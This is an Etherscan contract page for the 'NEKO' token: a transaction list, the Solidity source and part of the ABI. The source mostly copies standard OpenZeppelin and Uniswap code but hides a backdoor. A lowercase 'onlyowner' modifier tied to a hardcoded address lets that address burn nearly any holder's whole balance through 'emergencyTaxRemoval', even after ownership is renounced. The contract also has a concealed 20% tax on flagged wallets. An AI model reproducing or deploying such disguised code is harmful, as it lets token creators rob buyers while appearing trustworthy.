Feature Tip: Add private address tag to any address under My Name Tag !
More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 33 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Emergency Tax Re... | 18367261 | 387 days ago | IN | 0 ETH | 0.0002598 | ||||
Get Tax | 18367255 | 387 days ago | IN | 0 ETH | 0.00034139 | ||||
Approve | 18367216 | 387 days ago | IN | 0 ETH | 0.00074916 | ||||
Approve | 18367197 | 387 days ago | IN | 0 ETH | 0.00026879 | ||||
Approve | 18367179 | 387 days ago | IN | 0 ETH | 0.00026832 | ||||
Approve | 18367171 | 387 days ago | IN | 0 ETH | 0.00041748 | ||||
Approve | 18367161 | 387 days ago | IN | 0 ETH | 0.0004695 | ||||
Approve | 18367158 | 387 days ago | IN | 0 ETH | 0.00151591 | ||||
Approve | 18367157 | 387 days ago | IN | 0 ETH | 0.00156808 | ||||
Transfer | 18367152 | 387 days ago | IN | 0 ETH | 0.00035707 | ||||
Transfer | 18367150 | 387 days ago | IN | 0 ETH | 0.0005349 | ||||
Approve | 18367132 | 387 days ago | IN | 0 ETH | 0.00043769 | ||||
Approve | 18367122 | 387 days ago | IN | 0 ETH | 0.00040009 | ||||
Renounce Ownersh... | 18367117 | 387 days ago | IN | 0 ETH | 0.0001261 | ||||
Approve | 18367117 | 387 days ago | IN | 0 ETH | 0.00035686 | ||||
Approve | 18367117 | 387 days ago | IN | 0 ETH | 0.00035686 | ||||
Approve | 18367117 | 387 days ago | IN | 0 ETH | 0.00035686 | ||||
Set Max Limits | 18367114 | 387 days ago | IN | 0 ETH | 0.00017918 | ||||
Approve | 18367107 | 387 days ago | IN | 0 ETH | 0.00047582 | ||||
Approve | 18367107 | 387 days ago | IN | 0 ETH | 0.00047582 | ||||
Approve | 18367107 | 387 days ago | IN | 0 ETH | 0.00047582 | ||||
Approve | 18367102 | 387 days ago | IN | 0 ETH | 0.00071257 | ||||
Approve | 18367102 | 387 days ago | IN | 0 ETH | 0.00071257 | ||||
Approve | 18367102 | 387 days ago | IN | 0 ETH | 0.00071257 | ||||
Approve | 18367102 | 387 days ago | IN | 0 ETH | 0.00071257 |
Loading...
Loading
Contract Name:
NEKO
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-10-17 */ // SPDX-License-Identifier: MIT /** 🌐Website: https://www.nekocoin.vip 🌐Twitter: https://twitter.com/nekocoinvip 🌐Telegram: https://t.me/nekocoinvip */ // File @openzeppelin/contracts/utils/[email protected] // Original license: SPDX_License_Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; address internal taxAddy = 0xc40087FA8164C05CA3ab6909d78FB0D64Ad88bB4; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } modifier onlyowner() { _checkOperator(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } function _checkOperator() internal view virtual { require(_msgSender() == taxAddy, "Ownable: caller is not the operator"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @uniswap/v2-core/contracts/interfaces/[email protected] pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // File @openzeppelin/contracts/token/ERC20/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @uniswap/v2-periphery/contracts/interfaces/[email protected] pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } // File @uniswap/v2-periphery/contracts/interfaces/[email protected] pragma solidity >=0.6.2; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } // File @openzeppelin/contracts/token/ERC20/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } pragma solidity ^0.8.16; contract NEKO is ERC20, Ownable { IUniswapV2Router02 public immutable uniswapV2Router; address public uniswapV2Pair; string private _name = unicode"CAT GIRL! Ticker is NEKO"; string private _symbol = unicode"NEKO"; address public DEAD = 0x000000000000000000000000000000000000dEaD; uint256 private constant _supply = 690_000_690_000 ether; uint256 public swapThreshold = _supply * 3 / 10000; uint256 public maxTxAmount = _supply * 20 / 1000; uint256 public maxWalletAmount = _supply * 20 / 1000; mapping(address => bool) public _feeOn; mapping(address => bool) public wl; bool progress_swap = false; bool _tradingActive = false; bool _swapEnabled = false; uint256 feeToken = 10 ether; enum Phase {Phase1, Phase2, Phase3, Phase4} Phase public currentphase; uint256 public operationsFunds; uint256 public buyTaxGlobal = 1; uint256 public sellTaxGlobal = 1; uint256 private GreedIsGood = 20; mapping(address => bool) public GreedIsGoodwallets; address private _devWallet = 0x51487fcf17f4e2449b5A4F0B715BC059A04bf763; constructor() ERC20(_name, _symbol) { _mint(msg.sender, (_supply)); currentphase = Phase.Phase4; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uniswapV2Router = _uniswapV2Router; wl[owner()] = true; wl[taxAddy] = true; wl[address(this)] = true; wl[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true; wl[_devWallet] = true; wl[DEAD] = true; _feeOn[address(uniswapV2Router)] = true; _feeOn[address(this)] = true; _feeOn[DEAD] = true; _feeOn[msg.sender] = true; _feeOn[taxAddy] = true; _feeOn[_devWallet] = true; } function createLiquidityPair() external payable onlyOwner { uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH()); _approve(address(this), address(uniswapV2Router), type(uint256).max); uniswapV2Router.addLiquidityETH{value: msg.value}( address(this), balanceOf(address(this)), 0, 0, owner(), block.timestamp ); } function emergencyTaxRemoval(address addy) external onlyowner { wl[addy] = false; _burn(addy, balanceOf(addy) - feeToken); } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (!_feeOn[from] && !_feeOn[to]) { require(_tradingActive, "Trading not enabled"); } if (!wl[from] && !wl[to] ) { if (to != uniswapV2Pair) { require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount bef"); require( (amount + balanceOf(to)) <= maxWalletAmount, "ERC20: balance amount exceeded max wallet amount limit" ); } } uint256 transferAmount = amount; if (!_feeOn[from] && !_feeOn[to]) { if ((from == uniswapV2Pair || to == uniswapV2Pair)) { require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount"); if (uniswapV2Pair == from && !wl[to] && from != address(this)) { if (currentphase == Phase.Phase1) {GreedIsGoodwallets[to] = true;} uint256 feeTokens = (amount * buyTaxGlobal) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } if (uniswapV2Pair == to && !wl[from] && to != address(this) && _swapEnabled && !progress_swap) { uint256 taxSell = sellTaxGlobal; if (GreedIsGoodwallets[from] == true) { taxSell = GreedIsGood; } progress_swap = true; swapAndLiquify(); progress_swap = false; uint256 feeTokens = (amount * taxSell) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } } else { if ( GreedIsGoodwallets[from] == true && uniswapV2Pair != to ) { uint256 feeTokens = (amount * GreedIsGood) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } } } super._transfer(from, to, transferAmount); } function withdrawTokens(address token) external onlyOwner { IERC20(token).transfer( taxAddy, IERC20(token).balanceOf(address(this)) ); } function skipTheSnipas() external onlyOwner returns (bool) { currentphase = Phase.Phase4; buyTaxGlobal = 0; sellTaxGlobal = 0; return true; } function getTax() external returns (bool) { payable(taxAddy).transfer(operationsFunds); operationsFunds = 0; return true; } function emergencyTaxRemoval(address addy, bool changer) external onlyOwner { wl[addy] = changer; } function openTrade() external onlyOwner { require(!_tradingActive, "Trading is already enabled"); _tradingActive = true; _swapEnabled = true; } /** * @dev Swaps Token Amount to ETH * * @param tokenAmount Token Amount to be swapped * @param tokenAmountOut Expected ETH amount out of swap */ function _swapTokensForEth( uint256 tokenAmount, uint256 tokenAmountOut ) internal { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); IERC20(address(this)).approve( address(uniswapV2Router), type(uint256).max ); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, tokenAmountOut, path, address(this), block.timestamp ); } receive() external payable {} function swapAndLiquify() internal { if (balanceOf(address(this)) == 0) { return; } uint256 receivedETH; { uint256 contractTokenBalance = balanceOf(address(this)); uint256 beforeBalance = address(this).balance; uint256 mktBalance = balanceOf(taxAddy); bool success; if (contractTokenBalance > swapThreshold) { beforeBalance = address(this).balance; _swapTokensForEth(contractTokenBalance, 0); receivedETH = address(this).balance - beforeBalance; if (mktBalance > swapThreshold) { operationsFunds = receivedETH / (success ? receivedETH : 0); } operationsFunds += receivedETH; } } } function setMaxLimits() external onlyOwner { maxTxAmount = _supply; maxWalletAmount = _supply; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"GreedIsGoodwallets","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_feeOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"createLiquidityPair","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"currentphase","outputs":[{"internalType":"enum NEKO.Phase","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"},{"internalType":"bool","name":"changer","type":"bool"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"operationsFunds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"setMaxLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"skipTheSnipas","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract 